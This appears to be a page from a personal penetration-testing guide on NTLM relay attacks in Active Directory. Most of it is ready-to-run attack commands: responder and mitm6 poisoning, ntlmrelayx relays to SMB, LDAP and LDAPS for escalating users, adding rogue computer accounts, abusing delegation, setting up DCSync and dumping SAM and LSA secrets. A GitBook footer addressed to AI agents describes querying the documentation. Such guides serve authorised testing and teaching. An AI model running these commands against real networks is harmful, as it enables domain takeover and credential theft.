> For the complete documentation index, see [llms.txt](https://reaper.gitbook.io/my-penetration-test-guide/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://reaper.gitbook.io/my-penetration-test-guide/active-directory/relay-and-poisoning-attacks/ntlm-relay-attacks.md).

# NTLM Relay Attacks

## Understanding NTLM Relay

#### Core Concept

Instead of cracking the captured hashes by responder we can use these hashes to gain access to another machine.

Intercept NTLM authentication attempts (see [Authentication Triggers and Forcing Techniques](/my-penetration-test-guide/active-directory/relay-and-poisoning-attacks/authentication-triggers-and-forcing-techniques.md)) and relay them to target systems without needing to crack password hashes.

**Attack Flow**: 

{% code overflow="wrap" %}

```
Victim → Attacker (Relay Server) → Target System
```

{% endcode %}

* Victim initiates NTLM authentication to attacker
* Attacker forwards authentication to legitimate target
* Target grants access based on victim's credentials
* Attacker gains access as the victim

**Requirements**:

* Target systems without SMB signing being enabled or enabled but not enforced (By default, disabled on the normal workstations and enforced on the server)
* Victim authentication attempts either natural or forced

<table><thead><tr><th width="137.6666259765625">Relay type</th><th width="610.3334350585938">Requirements</th></tr></thead><tbody><tr><td>SMB to SMB</td><td>A domain user that is a local admin on the machine we are relaying the hash to</td></tr><tr><td>SMB to LDAP</td><td>LDAP server does not require signing (disabled or not enforced)</td></tr></tbody></table>

***

## SMB Relay Attacks

#### Classic SMB to SMB Relay

**Why?** Relay SMB authentication between different SMB services for lateral movement.

```bash
# Identify relay targets (systems without SMB signing)
crackmapexec smb <network-range> --gen-relay-list relay_targets.txt

# Basic SMB relay to multiple targets
python3 ntlmrelayx.py -tf relay_targets.txt -smb2support

# Start the responder to relay the hashes
sudo responder -I <interface> -dw
```

***

## Cross-Protocol Relay Attacks

#### SMB to LDAP Relay

**Why?** Relay SMB authentication to domain controllers for Active Directory privilege escalation.

**LDAP Privilege Escalation**

```bash
# Basic privilege escalation via LDAP relay
python3 ntlmrelayx.py -t ldap://<DC-IP> --escalate-user <low-priv-user>

# Add computer account via LDAP relay
python3 ntlmrelayx.py -t ldap://<DC-IP> --add-computer EVILCOMPUTER$ --computer-pass CompPass123!

# Delegate access permissions
python3 ntlmrelayx.py -t ldap://<DC-IP> --delegate-access --escalate-user <username>

# LDAP relay with DCSync attack setup
python3 ntlmrelayx.py -t ldap://<DC-IP> --escalate-user <username> --dump
```

**LDAPS (Secure LDAP) Relay**

```bash
# Relay to LDAPS (encrypted LDAP)
python3 ntlmrelayx.py -t ldaps://<DC-IP> --escalate-user <username>

# LDAPS with certificate validation bypass
python3 ntlmrelayx.py -t ldaps://<DC-IP> --escalate-user <username> --no-validate-privs

# Target specific LDAP operations
python3 ntlmrelayx.py -t ldap://<DC-IP> --add-computer NEWPC$ --delegate-access
```

**Requirements**: Domain controller accessible, victim with domain privileges&#x20;

**Attack Value**: Domain admin rights, DCSync capabilities, computer account creation

***

## Advanced Relay Techniques

#### IPv6 + NTLM Relay Combination

**Purpose**: Combine IPv6 attacks with NTLM relay for enhanced targeting and stealth.

**mitm6 + ntlmrelayx Integration**

```bash
# Terminal 1: IPv6 DHCPv6 attack
sudo mitm6 -d <domain.com> --ignore-nofqdn

# Terminal 2: NTLM relay with IPv6 support
python3 ntlmrelayx.py -6 -t ldaps://<DC-IP> --escalate-user <username> --delegate-access

# Terminal 3: Monitor for incoming connections
sudo netstat -tuln | grep :445
```

**Requirements**: IPv6 enabled in target environment&#x20;

**Attack Value**: More reliable targeting, DNS manipulation, stealth

#### Multi-Protocol Relay Chains

**Purpose**: Chain multiple relay operations across different protocols for complex attack paths.

```bash
# Multi-target relay with different protocols
python3 ntlmrelayx.py -tf mixed_targets.txt -smb2support

# Where mixed_targets.txt contains:
# smb://server1.domain.com
# http://webapp.domain.com
# ldap://dc.domain.com
# mssql://database.domain.com

# Chain with specific operations per protocol
python3 ntlmrelayx.py -t ldap://<DC-IP> --escalate-user <user> \
    -tf smb_targets.txt --sam --lsa
```


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://reaper.gitbook.io/my-penetration-test-guide/active-directory/relay-and-poisoning-attacks/ntlm-relay-attacks.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.